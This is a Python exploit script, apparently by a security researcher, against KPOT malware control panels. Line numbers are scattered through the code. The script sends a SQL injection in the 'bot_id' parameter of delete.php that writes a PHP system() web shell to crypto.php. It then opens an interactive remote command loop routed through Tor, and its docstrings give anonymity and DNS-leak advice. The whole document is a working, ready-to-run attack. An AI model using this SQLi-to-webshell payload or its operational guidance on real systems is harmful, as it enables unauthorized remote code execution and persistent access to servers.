1import requests
2import argparse
3import base64
4
5# KPOT Control Panel RCE
# requires PySocks (pip install "requests[socks]") so requests can talk to the Tor SOCKS proxy, and requests for the HTTP requests :-p
7
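def get_args():
    """Parse the command line.

    Returns an argparse.Namespace with:
      target -- base URL of the KPOT web panel, e.g. http://target.com/panel/
      proxy  -- proxy URL handed to requests for both http and https
                (default: Tor Browser's SOCKS port on localhost:9150)

    The default proxy scheme is ``socks5h`` rather than ``socks5``: with a
    plain ``socks5://`` URL requests/urllib3 resolves the target hostname
    *locally*, so the operator's DNS resolver learns which panel is being
    hit even though the TCP connection itself goes through Tor.
    ``socks5h://`` hands name resolution to the proxy (Tor supports this),
    so nothing about the target leaves the machine in the clear.  Anyone
    passing their own proxy with ``-p`` should keep that in mind.
    """
    parser = argparse.ArgumentParser(
        prog="kpot_sploit.py",
        formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
        epilog='''
    This script will exploit the RCE/SQL vulnerability in KPOT Dashboard.
    ''')
    parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/panel/)")
    parser.add_argument(
        "-p", "--proxy",
        default="socks5h://localhost:9150",
        help="Configure a proxy in the format http://127.0.0.1:8080/ "
             "(default = tor; prefer socks5h:// so DNS is resolved by the proxy, not locally)")
    return parser.parse_args()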
20
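def pwn_target(target, proxy, timeout=60):
    """Drop a PHP web shell on a KPOT panel and give the operator a command loop.

    target  -- base URL of the panel; a trailing slash is stripped so the
               paths below do not become ``panel//delete.php``
    proxy   -- proxy URL used for every request, http and https alike
    timeout -- per-request timeout in seconds (connect + read); without it a
               dead or stalled Tor circuit hangs the tool forever

    What the requests below do:
      1. GET delete.php with a crafted ``bot_id``.  The panel puts that value
         into an SQLite statement unescaped, so the payload closes the string
         literal, ATTACHes a new database file called ``crypto.php`` in the
         web root and INSERTs one row containing
         ``<?php echo system($_POST["cmd"]); ?>``.  SQLite writes that row to
         disk, which turns the file into a PHP page that executes whatever
         arrives in POST ``cmd``.
      2. Loop: read a command, POST it to crypto.php and print the body minus
         its first 300 bytes (the SQLite file header and table metadata come
         before the command output in the served file).

    Before the payload goes out, a plain-HTTP "what is my IP" request is made
    through the same proxy so the operator can confirm the proxy really is in
    the path.  Every panel request uses ``verify=False`` because these panels
    sit behind self-signed or bogus certificates; that also means an active
    MITM between the exit node and the panel can see and alter the session,
    so nothing in the responses is trusted -- it is only printed.

    Ctrl-C or EOF at the prompt (or during a request) exits with status 0.
    Any requests-level failure is reported, the last response body (if there
    is one) is dumped for debugging, and the exception is re-raised.
    """
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}
    base = target.rstrip('/')
    headers = {
        "User-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
    }
    # Common keyword arguments for every request aimed at the panel.
    panel_opts = dict(headers=headers, verify=False, proxies=proxies,
                      allow_redirects=False, timeout=timeout)
    # SQL injection via bot_id: ATTACH DATABASE creates crypto.php on disk and
    # the INSERT writes the PHP one-liner into it.  Kept byte-for-byte.
    get_params = {
        'bot_id': "666'; ATTACH DATABASE 'crypto.php' AS dba; CREATE TABLE IF NOT EXISTS dba.mytable(text TEXT NOT NULL); INSERT INTO dba.mytable VALUES('<?php echo system($_POST[\"cmd\"]); ?>'); --",
        'file': '123'
    }
    print('[*] Probing...')
    # Initialised so the error path below can never hit an unbound name if the
    # very first request fails.
    r = None
    try:
        r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies, timeout=timeout)
        print("[*] Your IP: {}".format(r.text))
        r = requests.get(base + '/delete.php', params=get_params, **panel_opts)
        print('[+] If it worked, you will get a funky shell...')
        while True:
            cmd = input("$ ")
            r = requests.post(base + '/crypto.php', data={'cmd': cmd}, **panel_opts)
            print(r.text[300:])
    except (KeyboardInterrupt, EOFError):
        print("[+] Bye! Don't forget to clean up.")
        raise SystemExit(0)
    except requests.RequestException:
        print("[-] ERROR: Something went wrong.")
        if r is not None:
            print(r.text)
        raise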
49
def main():
    """Entry point: print the banner, parse argv and launch the exploit."""
    # One print with a leading newline emits the same bytes as print() + print(msg).
    print("\nKPOT RCE by prsecurity.")
    options = get_args()
    panel_url = options.target.strip()
    proxy_url = options.proxy.strip()
    pwn_target(panel_url, proxy_url)
55
56
if __name__ == "__main__":
    # Only run when executed as a script; importing the module does nothing.
    main()